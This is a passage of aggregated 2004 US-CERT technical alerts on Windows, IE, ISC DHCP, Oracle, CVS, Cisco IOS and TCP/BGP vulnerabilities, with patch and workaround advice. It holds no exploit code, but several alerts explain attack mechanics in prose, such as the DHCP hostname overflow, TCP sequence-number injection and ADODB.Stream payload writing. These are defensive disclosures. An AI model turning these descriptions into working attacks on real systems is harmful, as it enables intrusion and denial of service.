Aggregator

Systems Affected  

• Microsoft Windows Systems

  Overview  

Microsoft has released a Security Bulletin Summary for July, 2004. There are several security bulletins released in this summary.

 

  Description   I. Description

Microsoft's Security Bulletin Summary for July, 2004 includes summaries of several bulletins that address vulnerabilities in various Windows applications and components. For more technical information, see US-CERT Technical Alert TA04-196A.

II. Impact

An attacker may be able to control your computer if these vulnerabilities are exploited.

III. Solution Apply a patch

Microsoft has provided the patches for these vulnerabilities in the Security Bulletins and on Windows Update.

Do not follow unsolicited links

Do not click on unsolicited links received in email, instant messages, web forums, or chat rooms. While this is generally a good security practice, following this behavior will not prevent the exploitation of these vulnerabilities in all cases.

Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Update your anti-virus software. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Specific information about the Security bulletins are available in the Security Bulletin Summary for July, 2004 and the US-CERT Vulnerability Notes for these issues. 
 

Appendix B. References

• Microsoft's Security Bulletin Summary for July, 2004 - <http://www.microsoft.com/security/bulletins/200407_windows.mspx>
• US-CERT Technical Cyber Security Alert TA04-196A - <http://www.us-cert.gov/cas/techalerts/TA04-196A.html>
• US-CERT Vulnerability Note VU#106324 - <http://www.kb.cert.org/vuls/id/106324>
• US-CERT Vulnerability Note VU#187196 - <http://www.kb.cert.org/vuls/id/187196>
• US-CERT Vulnerability Note VU#920060 - <http://www.kb.cert.org/vuls/id/920060>
• US-CERT Vulnerability Note VU#228028 - <http://www.kb.cert.org/vuls/id/228028>
• US-CERT Vulnerability Note VU#717748 - <http://www.kb.cert.org/vuls/id/717748>
• US-CERT Vulnerability Note VU#647436 - <http://www.kb.cert.org/vuls/id/647436>
• US-CERT Vulnerability Note VU#868580 - <http://www.kb.cert.org/vuls/id/868580>
• US-CERT Vulnerability Note VU#869640 - <http://www.kb.cert.org/vuls/id/869640>
• Increase Your Browsing and E-Mail Safety - <http://www.microsoft.com/security/incident/settings.mspx>
• Working with Internet Explorer 6 Security Settings - <http://www.microsoft.com/windows/ie/using/howto/security/settings.mspx>

 

This alert was created by Jason A. Rafail. Feedback can be directed to the Vulnerability Note authors: Jason A. Rafail, Jeffrey P. Lanza, Chad R. Dougherty, Damon G. Morda, and Art Manion.

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• July 14, 2004: Initial release
   

Last updated 

Systems Affected  

• Microsoft Windows Systems

  Overview  

Microsoft has released a Security Bulletin Summary for July, 2004. This summary includes several bulletins that address vulnerabilities in various Windows applications and components. Exploitation of some vulnerabilities can result in the remote execution of arbitrary code by a remote attacker. Details of the vulnerabilities and their impacts are provided below.

 

  Description  

The table below provides a reference between Microsoft's Security Bulletins and the related US-CERT Vulnerability Notes. More information related to the vulnerabilities is available in these documents.

Microsoft Security Bulletin Related US-CERT Vulnerability Note(s) MS04-024: Vulnerability in Windows Shell Could Allow Remote Code Execution (839645) VU#106324 Microsoft Windows contains a vulnerability in the way the Windows Shell launches applications MS04-023: Vulnerability in HTML Help Could Allow Code Execution (840315) VU#187196 Microsoft Windows fails to properly process showHelp URLs 
VU#920060 Microsoft Windows HTML Help component fails to properly validate input data MS04-022: Vulnerability in Task Scheduler Could Allow Code Execution (841873) VU#228028 Microsoft Windows Task Scheduler Buffer Overflow MS04-021: Security Update for IIS 4.0 (841373) VU#717748 Microsoft Internet Information Server (IIS) 4.0 contains a buffer overflow in the redirect function MS04-020: Vulnerability in POSIX Could Allow Code Execution (841872) VU#647436 Microsoft Windows contains a buffer overflow in the POSIX subsystem MS04-019: Vulnerability in Utility Manager Could Allow Code Execution (842526) VU#868580 Microsoft Windows Utility Manager launches applications with system privileges MS04-018: Cumulative Security Update for Outlook Express (823353) VU#869640 Microsoft Outlook Express fails to properly validate malformed e-mail headers

Impact

A remote, unauthenticated attacker may exploit VU#717748 to execute arbitrary code on an IIS 4.0 system.

Exploitation of VU#106324, VU#187196, VU#920060, and VU#228028, would permit a remote attacker to execute arbitrary code with the privileges of the current user. The attacker would have to convince a victim to view an HTML document (web page, HTML email) or click on a crafted URI link.

Vulnerabilities described in VU#647436 and VU#868580 permit a local user to gain elevated privileges on the local system.

Exploitation of VU#869640 can lead to a denial-of-service condition against Outlook Express.

Solution Apply a patch

Microsoft has provided the patches for these vulnerabilities in the Security Bulletins and on Windows Update.

Do not follow unsolicited links

It is generally a good practice not to click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. However, this practice does not always prevent exploitation of these types vulnerabilities. For example, a trusted web site could be compromised and modified to deliver exploit script to unsuspecting clients.

Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify and prevent some exploit attempts, but variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against these vulnerabilities. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Specific information about these issue are available in the Security Bulletin Summary for July, 2004 and the US-CERT Vulnerability Notes. 
 

Appendix B. References

• Microsoft's Security Bulletin Summary for July, 2004 - http://www.microsoft.com/technet/security/bulletin/ms04-jul.mspx
• US-CERT Vulnerability Note VU#106324 - http://www.kb.cert.org/vuls/id/106324
• US-CERT Vulnerability Note VU#187196 - http://www.kb.cert.org/vuls/id/187196
• US-CERT Vulnerability Note VU#920060 - http://www.kb.cert.org/vuls/id/920060
• US-CERT Vulnerability Note VU#228028 - http://www.kb.cert.org/vuls/id/228028
• US-CERT Vulnerability Note VU#717748 - http://www.kb.cert.org/vuls/id/717748
• US-CERT Vulnerability Note VU#647436 - http://www.kb.cert.org/vuls/id/647436
• US-CERT Vulnerability Note VU#868580 - http://www.kb.cert.org/vuls/id/868580
• US-CERT Vulnerability Note VU#869640 - http://www.kb.cert.org/vuls/id/869640
• Increase Your Browsing and E-Mail Safety - http://www.microsoft.com/security/incident/settings.mspx
• Working with Internet Explorer 6 Security Settings - http://www.microsoft.com/windows/ie/using/howto/security/settings.mspx

 

This alert was created by Jason A. Rafail. Feedback can be directed to the Vulnerability Note authors: Jason A. Rafail, Jeffrey P. Lanza, Chad R. Dougherty, Damon G. Morda, and Art Manion.

Revision History

• July 14, 2004: Initial release
   

  Last updated 

Systems Affected  

• Microsoft Windows systems

  Overview  

Microsoft has released a security update for Internet Explorer (IE) that disables the ADODB.Stream ActiveX control. This update reduces the impact of attacks against cross-domain vulnerabilities in IE.

  Description  

A class of vulnerabilities in IE allows malicious script from one domain to execute in a different domain which may also be in a different IE security zone. Attackers typically seek to execute script in the security context of the Local Machine Zone (LMZ). One such vulnerability (VU#713878) is described in US-CERT Technical Alert TA04-163A. Other cross-domain vulnerabilities have similar impacts.

After obtaining access to the LMZ through one or more of the vulnerabilities noted above, attackers typically attempt to download and run an executable file. Writing the executable to disk can be accomplished using the ADODB.Stream ActiveX control. In order to defeat this technique, Microsoft has released an update that disables the ADODB.Stream control. From Microsoft Knowledge Base Article 870669:

An ADO stream object contains methods for reading and writing binary files and text files. When an ADO stream object is combined with known security vulnerabilities in Internet Explorer, a Web site could execute scripts from the Local Machine zone. To help protect your computer from this kind of attack, you can manually modify your registry. 

 

It is important to note that there may be other ways for an attacker to write arbitrary data or to execute commands without relying on the ADODB.Stream control.

Further information is available from Microsoft in What You Should Know About Download.Ject. Instructions for securing IE and other web browsers against malicious web scripts are available in the Malicious Web Scripts FAQ.

Impact

By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE.

Recent incident activity known as Download.Ject (also JS.Scob.Trojan, Scob, JS.Toofeer) uses cross-domain vulnerabilities and the ADODB.Stream control to install software that steals sensitive financial information.

Solution

Until a complete solution is available from Microsoft, consider the following workarounds.

Disable Active scripting and ActiveX controls

Disabling Active scripting and ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent widely used payload delivery techniques from functioning. Instructions for disabling Active scripting in the Internet Zone can be found in the Malicious Web Scripts FAQ. See Microsoft Knowledge Base Article 833633 for information about securing the Local Machine Zone. Also, Service Pack 2 for Windows XP (currently at RC2) includes these and other security enhancements for IE.
 

Do not follow unsolicited links

Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. While this is generally good security practice, following this behavior will not prevent exploitation of this vulnerability in all cases. For example, a trusted web site could be compromised and modified to deliver exploit script to unsuspecting clients.

Disable ADODB.Stream ActiveX control

One way to disable the ADODB.Stream control is to apply the update from the Microsoft Download Center (KB870669) or the Windows Update web site.

The ADODB.Stream control can also be disabled by modifying the Windows registry as described in Microsoft Knowledge Base Article 870669.

Both of these methods disable ADODB.Stream by setting the kill bit for the control in the Windows registry.

Note that disabling the ADODB.Stream control does not directly address any cross-domain vulnerabilities, nor does it prevent attacks. This workaround prevents a well-known and widely used technique for writing arbitrary data to disk after a cross-domain vulnerability has been exploited. There may be other ways for an attacker to write arbitrary data or execute commands.

Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Microsoft Corporation

Please see What You Should Know About Download.Ject and Microsoft Knowledge Base Article 870669.

 

Appendix B. References

• US-CERT Technical Alert TA04-163A - http://www.us-cert.gov/cas/techalerts/TA04-163A.html
• US-CERT Vulnerability Note VU#713878 - http://www.kb.cert.org/vuls/id/713878
• Malicious Web Scripts FAQ - http://www.cert.org/tech_tips/malicious_code_FAQ.html
• Results of the Security in ActiveX Workshop (PDF) http://www.cert.org/reports/activeX_report.pdf
• What You Should Know About Download.Ject - http://www.microsoft.com/security/incident/download_ject.mspx
• Increase Your Browsing and E-Mail Safety - http://www.microsoft.com/security/incident/settings.mspx
• Working with Internet Explorer 6 Security Settings - http://www.microsoft.com/windows/ie/using/howto/security/settings.mspx
• Microsoft Knowledge Base Article 870669 - http://support.microsoft.com/default.aspx?kbid=870669
• Microsoft Knowledge Base Article 833633 - http://support.microsoft.com/default.aspx?kbid=833633
• Microsoft Knowledge Base Article 182569 - http://support.microsoft.com/default.aspx?kbid=182569
• Microsoft Knowledge Base Article 240797 - http://support.microsoft.com/default.aspx?kbid=240797
• Windows XP Service Pack 2 Release Candidate 2 Preview - http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx

 

Feedback can be directed to the author: Art Manion

Revision History

• July 2, 2004: Initial release
   

  Last updated 

Systems Affected  

Systems running Internet Explorer and Microsoft Windows

  Overview  

Microsoft has released an important security update for Internet Explorer (IE). This update greatly reduces the impact of attacks against several vulnerabilities in IE.

  Description  

Several vulnerabilities in IE could allow a malicious web site or HTML email message to install software on your computer. This software could be used to steal sensitive financial information or perform other actions. Recent incident activity has been referred to as Download.Ject, JS.Scob.Trojan, Scob, and JS.Toofeer.

Microsoft has released a security update for IE that provides increased protection against this type of attack. Note that this update may not prevent attacks in all cases.

Resolution Install Critical Update

US-CERT recommends that users install the update from the Microsoft Download Center (KB870669) or the Windows Update web site.

Increase IE Security Settings

In addition, US-CERT strongly recommends that users modify IE security settings according to the instructions in the Malicious Web Scripts FAQ.

Further information is available from Microsoft in What You Should Know About Download.Ject.

References

• US-CERT Technical Alert TA04-184A - <http://www.us-cert.gov/cas/techalerts/TA04-184A.html>
• US-CERT Technical Alert TA04-163A - <http://www.us-cert.gov/cas/techalerts/TA04-163A.html>
• US-CERT Vulnerability Note VU#713878 - <http://www.kb.cert.org/vuls/id/713878>
• Malicious Web Scripts FAQ - <http://www.cert.org/tech_tips/malicious_code_FAQ.html>
• What You Should Know About Download.Ject - <http://www.microsoft.com/security/incident/download_ject.mspx>
• Increase Your Browsing and E-Mail Safety - <http://www.microsoft.com/security/incident/settings.mspx>
• Working with Internet Explorer 6 Security Settings - <http://www.microsoft.com/windows/ie/using/howto/security/settings.mspx>

Author: Art Manion

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• July 2, 2004: Initial release
   

Last updated 

Systems Affected

• ISC DHCP versions 3.0.1rc12 and 3.0.1rc13

Overview

Two vulnerabilities in the ISC DHCP allow a remote attacker to cause a
denial of the DHCP service on a vulnerable system. It may be possible to
exploit these vulnerabilities to execute arbitrary code on the system.

Description

As described in RFC
2131, "the Dynamic Host Configuration Protocol (DHCP) provides a
framework for passing configuration information to hosts on a TCP/IP
network." The Internet Systems Consortium's (ISC) Dynamic Host
Configuration Protocol (DHCP) 3 application contains two vulnerabilities
that present several potential buffer overflow conditions.

VU#317350 discusses
a buffer overflow vulnerability in the temporary storage of log lines.
In transactions, ISC DHCPD logs every DHCP packet along with several
pieces of descriptive information. The client's DISCOVER and the
resulting OFFER, REQUEST, ACK, and NAKs are all logged. In all of these
messages, if the client supplied a hostname, then it is also included
in the logged line. As part of the DHCP datagram format, a client may
specify multiple hostname options, up to 255 bytes per option. These
options are concatenated by the server. If the hostname and options
contain only ASCII characters, then the string will pass non-ASCII
character filters and be temporarily stored in 1024 byte fixed-length
buffers on the stack. If a client supplies enough hostname options, it
is possible to overflow the fixed-length buffer.

VU#654390 discusses C
include files for systems that do not support the bounds checking
vsnprintf() function. These files define the bounds checking vsnprintf()
to the non-bounds checking vsprintf() function. Since vsprintf() is a
function that does not check bounds, the size is discarded, creating the
potential for a buffer overflow when client data is supplied. Note that
the vsnprintf() statements are defined after the vulnerable code that is
discussed in VU#317350. Since the preconditions for this vulnerability
are similar to those required to exploit VU#317350, these buffer overflow
conditions occur sequentially in the code after the buffer overflow
vulnerability discussed in VU#317350, and these issues were discovered and
resolved at the same time, there is no known exploit path to exploit these
buffer overflow conditions caused by VU#654390. Note that VU#654390 was
discovered and exploitable once VU#317350 was resolved.

For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP
3.0.1rc13 are believed to be vulnerable. VU#317350 is exploitable for all
operating systems and configurations. VU#654390 is only defined for the
following operating systems:

• AIX
• AlphaOS
• Cygwin32
• HP-UX
• Irix
• Linux
• NextStep
• SCO
• SunOS 4
• SunOS 5.5
• Ultrix

All versions of ISC DCHP 3, including all snapshots, betas, and release
candidates, contain the flawed code. However, versions other than ISC DHCP
3.0.1rc12 and ISC DHCP 3.0.1rc13 discard all but the last hostname option
provided by the client, so it is not believed that these versions are
exploitable.

US-CERT is tracking these issues as VU#317350, which has been
assigned CVE CAN-2004-0460,
and VU#654390, which
has been assigned CVE CAN-2004-0461.

Impact

Exploitation of these vulnerabilities may cause a denial-of-service
condition to the DHCP daemon (DHCPD) and may permit a remote attacker to
execute arbitrary code on the system with the privileges of the DHCPD
process, typically root.

Solution

Apply patches or upgrade

These issues have been resolved in ISC DHCP 3.0.1rc14.
Your vendor may provide specific patches or updates. For vendor-specific
information, please see your vendor's site, or look for your
vendor infomation in VU#317350 and VU#654390. As
vendors report new information to US-CERT, we will update the
vulnerability notes.

Appendix A. References

• http://www.isc.org/sw/dhcp/
• http://www.kb.cert.org/vuls/id/317350
  
  
• http://www.kb.cert.org/vuls/id/654390
  

US-CERT thanks Gregory Duchemin and Solar Designer for
discovering, reporting, and resolving this vulnerability. Thanks also to
David Hankins of ISC for notifying us of this vulnerability and the
technical information provided to create this document.

Feedback can be directed to the author: Jason
A. Rafail

Revision History

• June 22, 2004: Initial release
  

  Last updated

Systems Affected  

• Microsoft Windows systems

  Overview  

Microsoft Internet Explorer (IE) contains a flaw that could allow attackers to run programs of their choice on your computer.

  Description  

Microsoft IE uses a cross-domain security model to separate content from different sources. A flaw in the model makes IE vulnerable to a cross-domain violation. Attackers could exploit this flaw to execute programs on your computer.

Resolution Apply a patch

Micrososft has released a patch to resolve this issue. It is available from Microsoft Windows Update or Microsoft Security Bulletin MS04-025.

Disable Active scripting and ActiveX controls

Instructions for disabling Active scripting and ActiveX controls in the Internet Zone can be found in the Malicious Web Scripts FAQ.

Do not follow unsolicited links

Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels.

Run and maintain an antivirus product

It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible.

References

• US-CERT Technical Alert TA04-163A - <http://www.us-cert.gov/cas/techalerts/TA04-163A.html>
• Vulnerability Note VU#713878 - <http://www.kb.cert.org/vuls/id/713878>
• Microsoft Windows Update - <http://windowsupdate.microsoft.com/>
• Microsoft Security Bulletin MS04-025 - <http://www.microsoft.com/technet/security/bulletin/MS04-025.mspx>
• Malicious Web Scripts FAQ - <http://www.cert.org/tech_tips/malicious_code_FAQ.html>
• Protect Your PC - <http://www.microsoft.com/security/protect/default.asp>
• Increase Your Browsing and E-Mail Safety - <http://www.microsoft.com/security/incident/settings.mspx>

Author: Michael Durkota

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• June 11, 2004: Initial release
  July 30, 2004: Added patch information and links to MS04-025
   

Last updated 

Systems Affected  

• Microsoft Windows systems

  Overview  

A cross-domain vulnerability in Internet Explorer (IE) could allow an attacker to execute arbitrary code with the privileges of the user running IE.

  Description  

There is a cross-domain vulnerability in the way IE determines the security zone of a browser frame that is opened in one domain then redirected by a web server to a different domain. A complex set of conditions is involved, including a delayed HTTP response (3xx status code) to change the content of the frame to the new domain. Vulnerability Note VU#713878 describes this vulnerability in more technical detail and will be updated as further information becomes available.

Other programs that host the WebBrowser ActiveX control or use the MSHTML rendering engine, such as Outlook and Outlook Express, may also be affected.

This issue has been assigned CVE CAN-2004-0549.

Impact

By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE.

Publicly available exploit code exists for this vulnerability, and US-CERT has monitored incident reports that indicate that this vulnerability is being actively exploited.

Solution Apply a patch

 

Microsoft has released a cumulative patch (867801) in Security Bulletin MS04-025 which addresses this issue.

Workarounds Disable Active scripting and ActiveX controls

Disabling Active scripting and ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent widely used payload delivery techniques from functioning. Instructions for disabling Active scripting in the Internet Zone can be found in the Malicious Web Scripts FAQ. See Microsoft Knowledge Base Article 833633 for information about securing the Local Machine Zone. Also, Service Pack 2 for Windows XP (currently at RC1) includes these and other security enhancements for IE.
 

Do not follow unsolicited links

Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels. While this is generally good security practice, following this behavior will not prevent exploitation of this vulnerability in all cases.

Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

 

Appendix B. References

• Microsoft Security Bulletin MS04-025 - <http://www.microsoft.com/technet/security/bulletin/MS04-025.mspx>
• Vulnerability Note VU#713878 - <http://www.kb.cert.org/vuls/id/713878>
• US-CERT Technical Cyber Security Alert TA04-212A - <http://www.us-cert.gov/cas/techalerts/TA04-212A.html>
• Malicious Web Scripts FAQ - <http://www.cert.org/tech_tips/malicious_code_FAQ.html#steps>
• Computer Virus Resources - <http://www.us-cert.gov/reading_room/virus.html>
• CVE CAN-2004-0549 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0549>
• Microsoft Knowledge Base Article 833633 - <http://support.microsoft.com/default.aspx?scid=833633>
• Windows XP Service Pack 2 RC1 - <http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/winxpsp2.mspx>
• Increase Your Browsing and E-Mail Safety - <http://www.microsoft.com/security/incident/settings.mspx>
• Working with Internet Explorer 6 Security Settings - <http://www.microsoft.com/windows/ie/using/howto/security/settings.mspx>

 

Public incidents related to this vulnerability were reported by Rafel Ivgi. Thanks to Jelmer for further research and analysis.

Feedback can be directed to the author: Art Manion.

Revision History

• June 11, 2004: Initial release
  July 30, 2004: Added links to MS04-025
  December 3, 2004: Added reference to TA04-212A
   

  Last updated 

Systems Affected

• Oracle Applications 11.0 (all releases)
• Oracle E-Business Suite 11i, 11.5.1 through 11.5.8

Overview

A vulnerability in the Oracle's E-Business Suite allows a remote
attacker to execute arbitrary script on a vulnerable database system.
Exploitation may lead to compromise of the database application, data
integrity, or underlying operating system.

Description

Oracle E-Business Suite is a set of applications and modules that
enables an organization to manage customer interactions, deliver services,
manufacture products, ship orders, collect payments, and other tasks using
a single database model.

According to the Oracle
Security Alert 67, Oracle Applications 11.0 (all releases) and Oracle
E-Business Suite Release 11i, 11.5.1 through 11.5.8 are vulnerable to SQL
injection vulnerabilities. Oracle E-Business Suite Release 11.5.9 and
later are not vulnerable. This vulnerability is not platform specific.
Integrigy Corporation has also released an alert
about these vulnerabilities.

Note that no authentication mechanisms of Oracle E-Business Suite will
mitigate exploitation of the attack.

US-CERT is tracking this issue as VU#961579.

Impact

An unauthenticated attacker could exploit this vulnerability to execute
arbitrary SQL statements on the vulnerable system with the privileges of
the Oracle server process. In addition to compromising the integrity of
the database information, this may lead to the compromise of the database
application and the underlying operating system.

Solution

Apply Patch or Upgrade

According to the Oracle Security
Alert 67, patches and related information are available from:

http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=274375.1

Note that the above link requires registration to Oracle Metalink. To
register for support, please visit:

http://metalink.oracle.com/register/pls/registration.step_1

Appendix B. References

• http://otn.oracle.com/deploy/security/pdf/2004alert67.pdf
  
• http://www.integrigy.com/alerts/OraAppsSQLInjection.htm
  
• http://www.kb.cert.org/vuls/id/961579
  

US-CERT thanks Stephen Kost of Integrigy Corporation for reporting this
problem and for information used to construct this advisory.

Feedback can be directed to the author: Jason
A. Rafail

Revision History

• June 8, 2004: Initial release
  
  June 9, 2004: Added Oracle support registration link
  

  Last updated

Systems Affected  

• Concurrent Versions System (CVS) versions prior to 1.11.16
• CVS Features versions prior to 1.12.8

  Overview  

A heap overflow vulnerability in the Concurrent Versions System (CVS) could allow a remote attacker to execute arbitrary code on a vulnerable system.

  Description  

CVS is a source code maintenance system that is widely used by open-source software development projects. There is a heap memory overflow vulnerability in the way CVS handles the insertion of modified and unchanged flags within entry lines. When processing an entry line, an additional byte of memory is allocated to flag the entry as modified or unchanged. There is a failure to check if a byte has been previously allocated for the flag, which creates an off-by-one buffer overflow. By calling a vulnerable function several times and inserting specific characters into the entry lines, a remote attacker could overwrite multiple blocks of memory. In some environments, the CVS server process is started by the Internet services daemon (inetd) and may run with root privileges.

An authenticated client could exploit this vulnerability to execute arbitrary code, execute commands, modify sensitive information, or cause a denial of service. Note that if a CVS server is configured to permit anonymous read-only access, then this provides sufficient access to exploit a vulnerable server, as anonymous users are authenticated through the cvspserver process.

US-CERT is tracking this issue as VU#192038. This reference number corresponds to CVE candidate CAN-2004-0396.

Impact

An authenticated client could exploit this vulnerability to execute arbitrary code on the vulnerable system with the privileges of the CVS server process. It is possible for an anonymous user with read-only access to exploit a vulnerable server as they are authenticated through the cvspserver process.

In addition to compromising the system running CVS, there is a significant secondary impact in that source code maintained in CVS repositories could be modified to include Trojan horses, backdoors, or other malicious code.

Solution

Apply Patch or Upgrade

Apply the appropriate patch or upgrade as specified by your vendor. For vendor specific responses, please see your vendor's website or Vulnerability Note VU#192038.

 

This issue has been resolved in Stable CVS Version 1.11.16 and CVS Feature Version 1.12.8.

Disable CVS Server
 

Until a patch or upgrade can be applied, consider disabling the CVS server.
 

 

Block or Restrict Access
 

Block or restrict access to the CVS server from untrusted hosts and networks. The CVS server typically listens on 2401/tcp, but may use another port or protocol.

Limit CVS Server Privileges

• Configure CVS server to run in a restricted (chroot) environment.
• Run CVS servers with the minimum set of privileges required on the host file system.
• Provide separate systems for development (write) and public/anonymous (read-only) CVS access.
• Host public/anonymous CVS servers on single-purpose, secured systems.

Note that some of these workarounds will only limit the scope and impact of possible attacks. Note also that anonymous (read-only) access is sufficent to exploit this vulnerability.

 

 

Appendix B. References

• http://security.e-matters.de/advisories/072004.html
   
• http://secunia.com/advisories/11641/
   
• http://www.securitytracker.com/alerts/2004/May/1010208.html
   
• http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt

 

US-CERT thanks Stefan Esser of e-matters for reporting this problem and for information used to construct this advisory.

Feedback can be directed to the authors: Jason A. Rafail and Damon Morda

Revision History

• May 26, 2004: Initial release
   

  Last updated 

Systems Affected

• Cisco routers and switches running vulnerable versions of IOS.



Vulnerable IOS versions known to be affected include:

• 12.0(23)S4, 12.0(23)S5
• 12.0(24)S4, 12.0(24)S5
• 12.0(26)S1
• 12.0(27)S
• 12.0(27)SV, 12.0(27)SV1
• 12.1(20)E, 12.1(20)E1, 12.1(20)E2
• 12.1(20)EA1
• 12.1(20)EW, 12.1(20)EW1
• 12.1(20)EC, 12.1(20)EC1
• 12.2(12g), 12.2(12h)
• 12.2(20)S, 12.2(20)S1
• 12.2(21), 12.2(21a)
• 12.2(23)
• 12.3(2)XC1, 12.3(2)XC2
• 12.3(5), 12.3(5a), 12.3(5b)
• 12.3(6)
• 12.3(4)T, 12.3(4)T1, 12.3(4)T2, 12.3(4)T3
• 12.3(5a)B
• 12.3(4)XD, 12.3(4)XD1

Overview

There is a vulnerability in Cisco's Internetwork Operating System (IOS) SNMP service. When vulnerable Cisco routers or switches process specific SNMP requests, the system may reboot. If repeatedly exploited, this vulnerability could result in a sustained denial of service (DoS).

This vulnerability is distinct from the vulnerability described in US-CERT Technical Alert TA04-111A issued earlier today. Cisco has published an advisory about this distinct SNMP issue at the following location:

http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml

Description

The Simple Network Management Protocol (SNMP) is a widely deployed protocol that is commonly used to monitor and manage network devices. There are several types of SNMP messages that are used to request information or configuration changes, respond to requests, enumerate SNMP objects, and send both solicited and unsolicited alerts. These messages use UDP to communicate network information between SNMP agents and managers.

There is a vulnerability in Cisco's IOS SNMP service in which attempts to process specific SNMP messages are handled incorrectly. This may potentially cause the device to reload.

Typically, ports 161/udp and 162/udp are used during SNMP operations to communicate. In addition to these well-known ports, Cisco IOS uses a randomly selected UDP port in the range from 49152/udp to 59152/udp (and potentially up to 65535) to listen for other types of SNMP messages. While SNMPv1 and SNMPv2c formatted messages can trigger this vulnerability, the greatest risk is exposed when any SNMPv3 solicited operation is sent to a vulnerable port.

Cisco notes in their advisory:

SNMPv1 and SNMPv2c solicited operations to the vulnerable ports will perform an authentication check against the SNMP community string, which may be used to mitigate attacks. Through best practices of hard to guess community strings and community string ACLs, this vulnerability may be mitigated for both SNMPv1 and SNMPv2c. However, any SNMPv3 solicited operation to the vulnerable ports will reset the device. If configured for SNMP, all affected versions will process SNMP version 1, 2c and 3 operations.

Cisco is tracking this issue as CSCed68575. US-CERT is tracking this issue as VU#162451.

Impact

A remote, unauthenticated attacker could cause the vulnerable device to reload. Repeated exploitation of this vulnerability could lead to a sustained denial of service condition.

Solution Upgrade to fixed versions of IOS

Cisco has published detailed information about upgrading affected Cisco IOS software to correct this vulnerability. System managers are encouraged to upgrade to one of the non-vulnerable releases. For additional information regarding availability of repaired releases, please refer to the "Software Versions and Fixes" section of the Cisco Security Advisory.

Workarounds

Cisco recommends a number of workarounds, including disabling SNMP processing on affected devices. For a complete list of workarounds, see the Cisco Security Advisory.

Appendix A. Vendor Information

This appendix contains information provided by vendors for this
advisory. As vendors report new information to US-CERT, we will update
this section and note the changes in our revision history. If a
particular vendor is not listed below, we have not received their
comments.

Cisco Systems

Please refer to Cisco Security Advisory: "Vulnerabilities in SNMP Message Processing".
Cisco has published their advisory at the following location:

http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml

US-CERT thanks Cisco Systems for notifying us about
this problem.

Feedback can be directed to the authors: Jeff Havrilla, Shawn Hernan, Damon Morda

The latest version of this document can be found at: http://www.us-cert.gov/cas/techalerts/TA04-111B.html

Copyright 2004 Carnegie Mellon University. Terms of use: http://www.us-cert.gov/legal.html

Revision History

• April 20, 2004: Initial release
  

  Last updated

Systems Affected

• Systems that rely on persistent TCP connections, for example
  routers supporting BGP

Overview

Most implementations of the Border Gateway Protocol (BGP) rely on the
Transmission Control Protocol (TCP) to maintain persistent
unauthenticated network sessions. There is a vulnerability in TCP
which allows remote attackers to terminate network sessions. Sustained
exploitation of this vulnerability could lead to a denial of service
condition; in the case of BGP systems, portions of the Internet
community may be affected. Routing operations would recover quickly
after such attacks ended.

Description

In 2001, the CERT Coordination Center released CA-2001-09,
describing statistical weaknesses in various TCP/IP Initial Sequence
generators. In that document, it was noted by Tim Newsham:

[I]f a sequence number within the receive window is known,
an attacker can inject data into the session stream or terminate the
connection. If the ISN value is known and the number of bytes sent
already sent is known, an attacker can send a simple packet to inject
data or kill the session. If these values are not known exactly, but
an attacker can guess a suitable range of values, he can send out a
number of packets with different sequence numbers in the range until
one is accepted. The attacker need not send a packet for every
sequence number, but can send packets with sequence numbers a
window-size apart. If the appropriate range of sequence numbers is
covered, one of these packets will be accepted. The total number of
packets that needs to be sent is then given by the range to be
covered divided by the fraction of the window size that is used as an
increment.

Paul Watson has performed the statistical analysis of this attack when the
ISN is not known and has pointed out that such an attack could be viable
when specifically taking into account the TCP Window size. He has also
created a proof-of-concept tool demonstrating the practicality of the
attack. The National Infrastructure Security Co-Ordination Centre (NISCC)
has published an advisory summarizing Paul Watson's analysis in NISCC Vulnerability Analysis 236929.

Since TCP is an insecure protocol, it is possible to inject
transport-layer packets into sessions between hosts given the right
preconditions. The TCP/IP Initial Sequence
Number vulnerability (VU#498440) referenced in CA-2001-09 is one
example of how an attacker could inject TCP packets into a session. If
